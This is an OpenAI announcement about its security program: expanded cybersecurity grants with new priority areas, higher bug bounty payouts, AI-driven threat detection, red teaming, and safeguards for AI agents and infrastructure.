Security on the Path to AGI
Updates on OpenAI’s Cybersecurity Grant Program, Bug Bounties and Security Initiatives
We’re sharing developments that reflect our progress, momentum and forward-looking commitment to security excellence on our ambitious path toward AGI.
Evolving our Cybersecurity Grant Program
Since launching the Cybersecurity Grant Program two years ago, we've reviewed over a thousand applications and funded 28 research initiatives, gaining critical insights into areas like prompt injection, secure code generation and autonomous cybersecurity defenses.
We're continuing to fund bold, innovative projects aimed at advancing the sciences of AI and cybersecurity.
The Cybersecurity Grant Program is now soliciting proposals for a wider range of projects. Priority focus areas for new grant applications include:
- Software patching: Leveraging AI to detect and patch vulnerabilities.
- Model privacy: Enhancing robustness against unintended exposure of private training data.
- Detection and response: Improving detection and response capabilities against advanced persistent threats.
- Security integration: Boosting accuracy and reliability of AI integration with security tools.
- Agentic security: Increasing resilience in AI agents against sophisticated attacks.
We are also introducing microgrants for high quality proposals. These are API credits provided to researchers for quickly prototyping innovative cybersecurity ideas and experiments.
If you are interested in participating, we invite you to submit a proposal here.
Open-source security research
In addition to the Cybersecurity Grant Program, we are engaging researchers and practitioners throughout the cybersecurity community. This allows us to leverage the latest thinking and share our findings with those working toward a more secure digital world. To train our models, we partner with experts across academic, government, and commercial labs to benchmark skills gaps and obtain structured examples of advanced reasoning across cybersecurity domains. Collaboration has yielded impressive results on topics such as code security, an area where we intend to be industry leading with our model’s ability to find and patch vulnerabilities in code. We’ve internally demonstrated state of the art capability in this area with industry leading scores on public benchmarks, have found vulnerabilities in open source software code, and will be releasing security disclosures to relevant open source parties as we identify them and scale.
Expanding our Security Bug Bounty Program
Our Security Bug Bounty Program rewards security researchers for responsibly identifying vulnerabilities and threats within our infrastructure and products. We are making program enhancements to better address evolving threats.
Increased maximum bug bounty payouts
We are significantly increasing the maximum bounty payout for exceptional and differentiated critical findings to $100,000 (previously $20,000). This increase reflects our commitment to rewarding meaningful, high-impact security research that helps us protect users and maintain trust in our systems.
Bonus promotion period
To celebrate the expansion of our bug bounty program, we’re launching limited-time promotions. During promotional periods, researchers who submit qualifying reports within specific categories will be eligible for additional bounty bonuses. Each promotional category has specific, clearly defined eligibility criteria and timelines, which you can view on our Bug Bounty Program(opens in a new window) page.
Security threats evolve constantly and as we get closer to AGI, we expect our adversaries to become more tenacious, numerous and persistent. At OpenAI, we proactively adapt in multiple ways, including by building comprehensive security measures directly into our infrastructure and models.
AI-powered cyber defense
To protect our users, systems and intellectual property, we’re leveraging our own AI technology to scale our cyber defenses. We developed advanced methods to detect cyber threats and respond rapidly. As a supplement alongside conventional threat detection and incident response strategies, our AI-driven security agents help enhance threat detection capabilities, enable rapid response to evolving adversarial tactics, and equip security teams with precise, actionable intelligence necessary to counter sophisticated cyberattacks.
Continuous adversarial red teaming
We have partnered with SpecterOps(opens in a new window), renowned experts in security research and adversarial operations, to rigorously test our security defenses through realistic simulated attacks across our infrastructure, including corporate, cloud and production environments. These continuous assessments enable us to identify vulnerabilities proactively, enhance our detection capabilities, and strengthen our response strategies against sophisticated threats. Beyond these assessments, we are also collaborating to generate advanced skills training to improve our model capabilities into additional techniques for better protecting our products and models.
Disrupting threat actors and proactively combating malicious AI abuse
We continuously monitor and disrupt attempts by malicious actors to exploit our technologies. When we identify threats targeting us, such as a recent spear phishing campaign aimed at our employees(opens in a new window), we don’t just defend ourselves, we share tradecraft with other AI labs to strengthen our collective defenses. By sharing these emerging risks and collaborating across industry and government, we help ensure AI technologies are developed and deployed securely.
Securing emerging AI agents
As we introduce advanced AI agents, such as Operator and deep research, we invest in understanding and mitigating the unique security and resilience challenges that arise with such technology. Our efforts include developing robust alignment methods to defend against prompt injection attacks, strengthening underlying infrastructure security, and implementing agent monitoring controls to quickly detect and mitigate unintended or harmful behaviors. As part of this, we're building a unified pipeline and modular framework to provide scalable, real-time visibility and enforcement across agent actions and form-factors.
Security for future AI initiatives
Security is a cornerstone in the design and implementation of next-generation AI projects such as Stargate. We work with our partners to adopt industry-leading security practices such as zero-trust architectures and hardware-backed security solutions. Where we are substantially expanding our physical infrastructure, we closely partner to ensure our physical safeguards evolve in tandem with our AI capabilities. These strategies include implementing advanced access controls, comprehensive security monitoring, cryptographic protections, and defense in depth. These practices, combined with a focus on securing software and hardware supply chains, help build foundational security from the ground up.
Expanding our security program
We are growing our security program across several dimensions, and are looking for passionate engineers in several areas. If you are interested in protecting OpenAI and our customers – and building the future of secure and trustworthy AI—we’d love to hear from you(opens in a new window)!
Achieving our mission requires more than groundbreaking technology. It demands robust, continually evolving security practices. As our models rapidly advance—our technology’s capabilities surpass even where we stood six months ago—our responsibility to strengthen security measures grows proportionally.
Today, we serve more than 400 million weekly active users across businesses, enterprises and governments worldwide. This scale brings a crucial obligation to safeguard the systems, intellectual property and data our users entrust to us.
At OpenAI, security is a deep-rooted commitment that strengthens as our models and products advance. We remain fully dedicated to a proactive, transparent approach, driven by rigorous testing, collaborative research, and a clear goal: ensuring the secure, responsible and beneficial development of AGI.